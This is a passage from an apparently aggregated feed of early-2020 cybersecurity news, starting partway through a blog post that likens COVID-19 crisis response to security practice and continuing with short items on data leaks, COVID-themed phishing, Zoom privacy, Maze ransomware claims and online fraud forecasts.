Below you can see the number of Tests conducted vs. Total confirmed cases in different countries around the world:

Along the same lines, the same testing (or monitoring) practices should be followed in cybersecurity.

Should threats remain hidden inside your organization, there will be room for lateral movement and future exploitation. However, the spread of malware infections can be stopped if you put a segmented architecture based on zero trust in place. The model is based on the belief that one should never trust anything inside an organization by default and should always verify everything in the first place. Zero trust networks are based upon micro-segmentation, which divides perimeters into small areas so that certain parts of your network remain isolated and have separate access. In case a data breach occurs, micro-segmentation limits further exploitation of your network.

What’s more, simply because people aren’t displaying any visible symptoms of COVID-19, that doesn’t necessarily mean they are not infected and therefore shouldn’t get tested. There have been cases of coronavirus false-negatives so far, which leaves experts worried about this type of inaccuracy amidst the outbreak.

However, even though under the pandemic universal testing may sound utopic due to logistical constraints and shortage of testing kits, the same should not apply when it comes to your organization’s security.

Most nations that have had a hard time enforcing social isolation rules have witnessed COVID-19 infections growing quicker. Italy, for instance, around a week ago, when around 41,000 people were infected and the outbreak was already out of control, was charging 50,000 individuals for breaking isolation laws. Fast forward another week later, the cases in Italy had almost doubled.

On the other hand, after imposing draconian lockdown measures and despite being the outbreak’s original source, China managed to flatten the coronavirus curve. They tried to proactively find infections rather than just passively wait for symptoms to develop. As you may already know, this approach is also considered a best practice in cybersecurity.

What’s more, a study has shown that as human mobility decreased in China after social distancing measures were put in place, so did new infections.

Image source: “The effect of human mobility and control measures on the COVID-19 epidemic in China”, available here

As you can see in Graph a, human mobility dropped after January 23, 2020, and was considerably lower than compared to January 2019, when cordon sanitaire (the health measures aimed at controlling the spread of the disease) was put in place for Wuhan. And after this date, the number of coronavirus cases and infection rate also started decreasing, as you can see in the charts below:

Image source: “The effect of human mobility and control measures on the COVID-19 epidemic in China”, available here

#3. Improving your defenses and mitigating risk

During this critical period, hospitals and governments had to beef up their defenses against COVID-19. Basically, more medical supplies than ever, like gloves, gowns, or ventilators, now have to be purchased. Needless to say, having the right number of protective equipment is vital. However, unfortunately, many countries were unprepared, even though they should have been able to see a disaster like this coming.

“When we have done exercises in the past for pandemic preparedness, supply chain issues were a well-documented challenge”, commented Saskia Popescu, an epidemiologist focused on hospital preparedness, for Vox.com. “This is something we’ve known about — maybe not to this extent, but this isn’t a shocker. It’s more surprising that we let it get this bad.”

Knowing that disaster could strike anytime is not to be neglected.

In a similar fashion, the same reasoning can be applied to an organization’s cybersecurity. Since knowing that cyber-attacks and data breaches could linger around the corner, would you not wish to protect your digital assets in the best possible way?

Through proactive security measures, such as staying on top of your patching or scanning your organization’s incoming and outgoing traffic through DNS filtering, and reactive defenses, like using a next-gen Antivirus and then extending your defenses to email security and privileged access rights management, your organization can achieve true cyber resilience.

What organizations can learn from a cybersecurity standpoint

First of all, security leaders should accept that any organization is exposed to cyber threats. After all, it’s a matter of when (not if).

Secondly, another vital step refers to testing (or in other words, gaining visibility inside your organization). This is how you can understand exactly if or which parts of your business are being affected and in case of an existing infection, be able to address it correctly. As I’ve mentioned before, micro-segmentation is recommended. Dividing your network into different security segments with fine-grained security controls will help you isolate different areas and limit the spread of a potential infection.

Last, but not least, organizations should operate with a prevention-first mindset and combine proactive and reactive protection measures. Prevention still is the best cure, after all.

Heimdal Official Logo

Simple Antivirus protection is no longer enough.

Thor Premium Enterprise

is the multi-layered Endpoint Detection and Response (EDR) approach
to organizational defense.
  • Next-gen Antivirus which stops known threats;
  • DNS traffic filter which stops unknown threats;
  • Automatic patches for your software and apps with no interruptions;
  • Protection against data leakage, APTs, ransomware and exploits;
Try it for FREE today Offer valid only for companies.

Bottom Line

In today’s unprecedented context, how long the COVID-19 pandemic will last is still uncertain. However, what is clear is that it has raised highly complex issues and revealed serious flaws in crisis management in multiple countries around the world. The outbreak only shows that we are completely unprepared to deal with it. However, it’s (probably) not too late to act now, remain optimistic, and prevent future outbreaks.

The post Decision Making Before and During Times of Crisis:  A Parallel Between Cybersecurity Incidents and the Current COVID-19 Pandemic appeared first on Heimdal Security Blog.

Carnegie Mellon Launches Cybersecurity Master’s Degree

Carnegie Mellon Launches Cybersecurity Master's Degree

Carnegie Mellon University (CMU) has launched a cybersecurity-focused master's degree program. 

The new program centers on building expertise in risk management, information security, and data privacy and aims to develop key skills in operations, strategy, and analysis. 

To earn their master's degree, student teams will have to solve real security problems for a national capital area–based organization or government agency.

Instead of being created as a standalone course, the new program will exist as a security-focused track within CMU's established Master of Science in Information Technology (MSIT) program, taught at Heinz College of Information Systems and Public Policy in Washington, DC.

The MSIT: Information Security and Assurance (Cybersecurity-DC) program will be taught by leading security practitioners and researchers and experts from the CERT Division of CMU’s Software Engineering Institute (SEI). 

Among the instructors already lined up for the program is retired Brigadier General Gregory J. Touhill, appointed by President Barack Obama as the first federal CISO of the United States government and currently serving as AppGate Federal Group's president.

"Cybersecurity-DC will create a robust pipeline of highly skilled mission-ready security professionals where it’s needed most—in the heart of the National Capital area region," said Touhill. "Federal agencies and private companies need creative leaders with the blend of skills we teach to better manage risk while defending their organizations and stakeholders against emerging threats."

The program will be delivered in a hybrid format that will see students complete the majority of coursework online. However, some in-person group sessions, seminars, and exams will take place at Heinz College’s DC campus. 

"During these sessions, cohort members will have the opportunity to develop a tight-knit community and create lasting peer networks," said a spokesperson for CMU.

“We’re excited to offer this program, which is unique in the field,” said Andy Wasser, associate dean at Heinz College. 

“Cybersecurity-DC brings together professionals to collaborate and form close bonds with their cohort. It effectively combines the convenience of online learning with our ethos of experiential learning and practical experience, which is crucial to success in the security context.”

The new program will commence in August 2020.

Remote work and web conferencing: Security and privacy considerations

As more and more people remain at home and work from home due to the COVID-19 pandemic, most of them have been forced to use one or many video and audio conferencing applications out of necessity. For the same reason, many companies have had to quickly introduce these new tools to their employees, all the while hoping the benefits will outweigh the risks until they have had the chance to introduce protections, policies and more … More

The post Remote work and web conferencing: Security and privacy considerations appeared first on Help Net Security.

Messing With Web Attackers With SpiderTrap (Cyber Deception)

Hello and welcome! My name is John Strand. In this video, we’re going to be talking about using SpiderTrap to entrap and ensnare any web application pentesters or hackers that are trying to come into your web applications. Now, for this particular video, we’re going to be using the Active Defense Harbinger Distribution, or ADHD, […]

The post Messing With Web Attackers With SpiderTrap (Cyber Deception) appeared first on Black Hills Information Security.

Google sent ~40K warnings to targets of state-backed attackers in 2019

Google has seen a rising number of attackers impersonating news outlets and journalists to spread fake news among other reporters.

Voter information for 4,934,863 Georgians leaked online

Voter information for 4,934,863 Georgians has been published on a hacker forum over the weekend.

According to the data breach notification service Under the Breach, on Saturday a file containing voter information for more than 4.9 million Georgians, including deceased citizens, has been published on a hacking forum.

Georgia has 3.7 million citizens, but the voting population is around one third.

Data were included in a Microsoft Access database file of a 1.04 GB.

Exposed personal information includes full names, home addresses, dates of birth, ID numbers, and mobile phone numbers.

Under the Breach shared the database with the online media outlet ZDNet that analyzed it and confirmed the presence of 4,934,863 records, many of them belonging to deceased voters.

“The database contained 4,934,863 records but was not kept up to date, as it also included details for millions of deceased voters — as can be seen from the screenshot below.” reads the post published by ZDNet.

The user that published the file on the hacker forum claims it was originated from official government portal voters.cec.gov.ge, which is the government service that allows voters to verify and update their registration records.

At the time it is not clear how data was obtained by the users that published it.

Similar incidents already occurred in the past, in September experts discovered a huge data leak affecting Ecuador, maybe the largest full-country leak, that exposed data belonging to 20 million Ecuadorian Citizens.

In August 2019, voter information of more than 14.3 million Chileans, which accounts for nearly 80% of the population, was exposed on the internet due to an unsecured Elasticsearch database.

Pierluigi Paganini

(SecurityAffairs – Georgians voters, hacking)

The post Voter information for 4,934,863 Georgians leaked online appeared first on Security Affairs.

AppTrana Offers Protection to Online Businesses During Coronavirus Outbreak

These are unprecedented times, and everyone is going through a testing period, with more than 3 billion people locked down all over the world. Businesses are scrambling to stay afloat and are forced to move digital in a very short span of time without much preparation. As these businesses move digital, cyber threats are more real than ever. Every day we are hearing news about hackers taking

Privacy vs. Surveillance in the Age of COVID-19

The trade-offs are changing:

As countries around the world race to contain the pandemic, many are deploying digital surveillance tools as a means to exert social control, even turning security agency technologies on their own civilians. Health and law enforcement authorities are understandably eager to employ every tool at their disposal to try to hinder the virus ­ even as the surveillance efforts threaten to alter the precarious balance between public safety and personal privacy on a global scale.

Yet ratcheting up surveillance to combat the pandemic now could permanently open the doors to more invasive forms of snooping later.

I think the effects of COVID-19 will be more drastic than the effects of the terrorist attacks of 9/11: not only with respect to surveillance, but across many aspects of our society. And while many things that would never be acceptable during normal time are reasonable things to do right now, we need to makes sure we can ratchet them back once the current pandemic is over.

Cindy Cohn at EFF wrote:

We know that this virus requires us to take steps that would be unthinkable in normal times. Staying inside, limiting public gatherings, and cooperating with medically needed attempts to track the virus are, when approached properly, reasonable and responsible things to do. But we must be as vigilant as we are thoughtful. We must be sure that measures taken in the name of responding to COVID-19 are, in the language of international human rights law, "necessary and proportionate" to the needs of society in fighting the virus. Above all, we must make sure that these measures end and that the data collected for these purposes is not re-purposed for either governmental or commercial ends.

I worry that in our haste and fear, we will fail to do any of that.

More from EFF.

#COVID19 Phishing Scam Tricks People With ‘You Might Be Infected’ Warning

#COVID19 Phishing Scam Tricks People With ‘You Might Be Infected’ Warning

Security awareness training and simulated phishing provider KnowBe4 has announced that it has discovered a new type of phishing scam warning people that they’ve come into contact with a friend/colleague/family member who has been infected with the coronavirus and so are at risk of being infected themselves.

The email, which is crafted to appear as though it has come from a legitimate hospital, instructs users to download a malicious attachment and proceed immediately to the hospital.

The attachment contains hidden malware, KnowBe4 explained, with a number of advanced functions that allow it to evade detection by security applications, worm its way deep into an infested system and serve as a platform for a variety of criminal activities.

“This is a new type of malware that we’re seeing, as it was reported for the first time just a few days ago,” said Eric Howes, principal lab researcher, KnowBe4. “For the bad guys, this is a target-rich environment that preys on end-users’ fears and heightened emotions during this pandemic. Employees need to be extra cautious when it comes to any emails related to COVID-19 and they need to be trained and educated to expect them, accurately identify them and handle them safely.”

The latest discovery is yet another example of how cyber-criminals are seeking to exploit people through phishing emails during the COVID-19 pandemic.

RDP and VPN use soars, increasing enterprise cyber risk

As COVID-19 slowly spread across the globe, consumer demand for commercial virtual private network (VPN) services has soared – both for security reasons and for bypassing geo-blocking of (streaming) content. Not unexpectedly, enterprise VPN use has also greatly increased, and so has the use of the Remote Desktop Protocol (RDP), a popular and common means for remotely managing a computer over a network connection. Increased enterprise RDP and VPN use Shodan creator John Matherly has … More

The post RDP and VPN use soars, increasing enterprise cyber risk appeared first on Help Net Security.

Zoom Stops Transferring Data by Default to Facebook

Privacy Gaffe Blamed on Facebook's iOS Software Development Kit
Zoom has apologized for sharing large sets of user data by default with Facebook, blaming the social network's software development kit, which it has removed from its iOS app. With COVID-19 driving unprecedented levels of remote working, video conferencing software is under the privacy and security microscope.

Government Launches Response Unit to Fight #COVID19 Fake News

Government Launches Response Unit to Fight #COVID19 Fake News

The British government has launched a new rapid response unit to coordinate the fight against online misinformation about COVID-19.

Reports suggest that the unit, operating from within the Cabinet Office and Number 10, will help to deal with “false and misleading narratives about coronavirus.” These will include everything from phishing scams to fake ‘experts’ issuing false medical advice.

Culture secretary, Oliver Dowden, has claimed that fake news could cost lives.

“We need people to follow expert medical advice and stay at home, protect the NHS and save lives,” he’s quoted by the BBC as saying. “It is vital that this message hits home and that misinformation and disinformation which undermines it is knocked down quickly.”

As part of these efforts, the government is relaunching a campaign on misinformation called “Don’t Feed the Beast.”

Most social media companies have said they will work with governments to try and halt the spread of rumors online.

Earlier this month, Twitter said it was broadening its definition of online harm to include content that contradicts guidance from public health and other trusted bodies. However, it also admitted that increasing its reliance on automated systems may result in more mistakes as they lack the context that human moderators can bring.

Also earlier in March, the UK’s National Cyber Security Centre (NCSC) said it was removing malicious and phishing websites linked to the pandemic, as businesses and consumers continue to be exposed to credential theft, identity fraud, ransomware and more.

The National Crime Agency also last week released information for individuals and businesses on how to stay safe from fraud and other scams.

It’s claimed the new government rapid response unit is dealing with around 70 incidents of misinformation each week.

COVID-19: Hackers Begin Exploiting Zoom’s Overnight Success to Spread Malware

As people increasingly work from home and online communication platforms such as Zoom explode in popularity in the wake of coronavirus outbreak, cybercriminals are taking advantage of the spike in usage by registering new fake "Zoom" domains and malicious "Zoom" executable files in an attempt to trick people into downloading malware on their devices. According to a report published by Check

Overcoming security complexity

There isn’t a country in the world in which security, and the threat of being hacked, isn’t an ongoing issue. However, Canadians, in particular, must take more preventative measures because they’re not faring well at all. The LifeLabs breach of late 2019 saw the medical records of 15 million Ontario and BC residents stolen. An…

Maze Authors Claim to Have Hit Insurer Chubb

Maze Authors Claim to Have Hit Insurer Chubb

A leading insurance provider appears to have been targeted by a notorious ransomware group, which is threatening to release information stolen from the company if it doesn’t pay up.

Chubb Insurance, which offers cyber-policies as well as other types of protection, has become the latest company singled out by the Maze group.

Once organizations have been infected with Maze ransomware the group lists them on its dedicated ‘News’ site, which Infosecurity won't link to, where they are given notice that stolen records will be published unless the ransom is paid.

It’s a relatively new but increasingly popular tactic used by ransomware gangs to force payment even if the victim organization has backed-up.

The group claimed on its site that Chubb was “locked” at some point in March. It included the emails of the firm’s CEO, COO and vice-chairman as ‘evidence’ of its intent, although the insurer has claimed its systems remain untouched.

"We are currently investigating a computer security incident that may involve unauthorized access to data held by a third-party service provider. We are working with law enforcement and a leading cybersecurity firm as part of our investigation,” it said in a statement.

“We have no evidence that the incident affected Chubb’s network. Our network remains fully operational and we continue to service all policyholder needs, including claims. Securing the data entrusted to Chubb is a top priority for us. We will provide further information as appropriate.”

That said, security researchers have discovered unpatched vulnerabilities at the firm which could theoretically have provided a route to ransomware infection.

Bad Packets Report claimed last week to have found five exposed Citrix Netscaler servers, after scanning for the CVE-2019-19781 vulnerability.

The flaw in Citrix Application Delivery Controller (ADC) and Citrix Gateway could allow an unauthenticated attacker to perform arbitrary code execution. It’s already been linked to multiple ransomware attacks including one on a German car parts manufacturer.

Global E-Commerce Fraud to Top $25bn by 2024

Global E-Commerce Fraud to Top $25bn by 2024

Global online payment fraud losses are set to soar by more than 50% over the coming four years to exceed $25bn per year, according to a new report from Juniper Research.

The market analyst’s report, Online Payment Fraud: Emerging Threats, Segment Analysis & Market Forecasts 2020-2024, predicted a 52% growth in merchant losses to scams over the period.

The growing popularity of online shopping combined with the enhanced security of card-present transactions through the EMV initiative is helping to drive much more fraud into e-commerce, the analyst claimed.

This is despite the launch of Secure Customer Authentication (SCA) checks in Europe, although this initiative has been delayed several times. The new rules, part of the EU’s PSD2 banking regulation, will now come into force by December 31 2020 in Europe and March 2021 in the UK.

They mandate that certain transactions be subject to two-factor authentication in order to help lock fraudsters out. However, there are concerns that SCA might also create extra user friction which puts consumers off.

Juniper Research urged merchants to work closely with security vendors to design and implement extra authentication checks in shopping apps that minimize friction.

It also argued that e-commerce providers must take a more educational role, providing information to customers on the need for improved cybersecurity and changes to checkout processes, as well as details on some of the most popular scams.

The analyst claimed this was particularly important in China, which it said will account for 42% of e-commerce fraud by 2024.

“The explosion of e-commerce means that fraudsters have evolved their tactics, and so merchants must also evolve,” argued report co-author, Nick Maynard.

“E-commerce merchants must educate their users in anti-fraud best practice, as the human element is consistently the most vulnerable to exploitation in the online payments ecosystem”.

Your colleague was infected with Coronavirus, this is the latest phishing lure

Security experts uncovered a new Coronavirus-themed phishing campaign, the messages inform recipients that they have been exposed to the virus.

Experts continue to spot Coronavirus-themed attack, a new phishing campaign uses messages that pretend to be from a local hospital informing the victims they have been exposed to the virus and that they need urgently to be tested.

Threat actors attempt to take advantage of the fear of the population of being infected with the COVID19 that is killing hundreds of thousands of people worldwide.

The phishing messages tell the victims that one of their colleagues, friends, or family members has tested positive for the virus, then it urges them to print the attached “EmergencyContact.xlsm” file and bring it with them to the nearest testing center.

Upon opening the file, victims will need to ‘Enable Content’ to view the content of the protected document, but this action will trigger the infection process.

“If a user enables content, malicious macros will be executed to download a malware executable to the computer and launch it.” reads the post published by BleepingComputer.

The malicious executable will inject multiple processes into the legitimate Windows msiexec.exe file to evade detection by security solutions.

The malicious code analyzed by BleepingComputer researchers is an information stealer, it attempts to steal cryptocurrency wallets and web browser cookies.

The malicious code also gets a list of programs running on the computer, looks for open shares on the network, and gets local IP address information configured on the computer.

Unfortunately, this is only one of the numerous Coronavirus-themed attacks recently observed by security researchers, below the list of the attacks observed in the last seven days.

Pierluigi Paganini

(SecurityAffairs – phishing, coronavirus)

The post Your colleague was infected with Coronavirus, this is the latest phishing lure appeared first on Security Affairs.

COVID-19 Scam Roundup – Week of 3/23/20

Many in the digital security community are coming together to combat malicious actors during the coronavirus disease 2019 (COVID-19) global outbreak. One of the most visible of these new efforts is the COVID-19 CTI League. Made up of approximately 400 volunteers living in approximately 40 countries, the COVID-19 CTI League is working to block attackers […]… Read More

The post COVID-19 Scam Roundup – Week of 3/23/20 appeared first on The State of Security.

Mr and Mrs CISO: Security in the Age of the Lockdown

With so many of us frantically learning to juggle our roles as parents, workers and most recently teachers; is it just my wife and I who feel it necessary to monitor the online activity of our teenagers during this lockdown? Sure, there’s rich educational content out there, but it sits amongst social networks, streaming services, […]… Read More

The post Mr and Mrs CISO: Security in the Age of the Lockdown appeared first on The State of Security.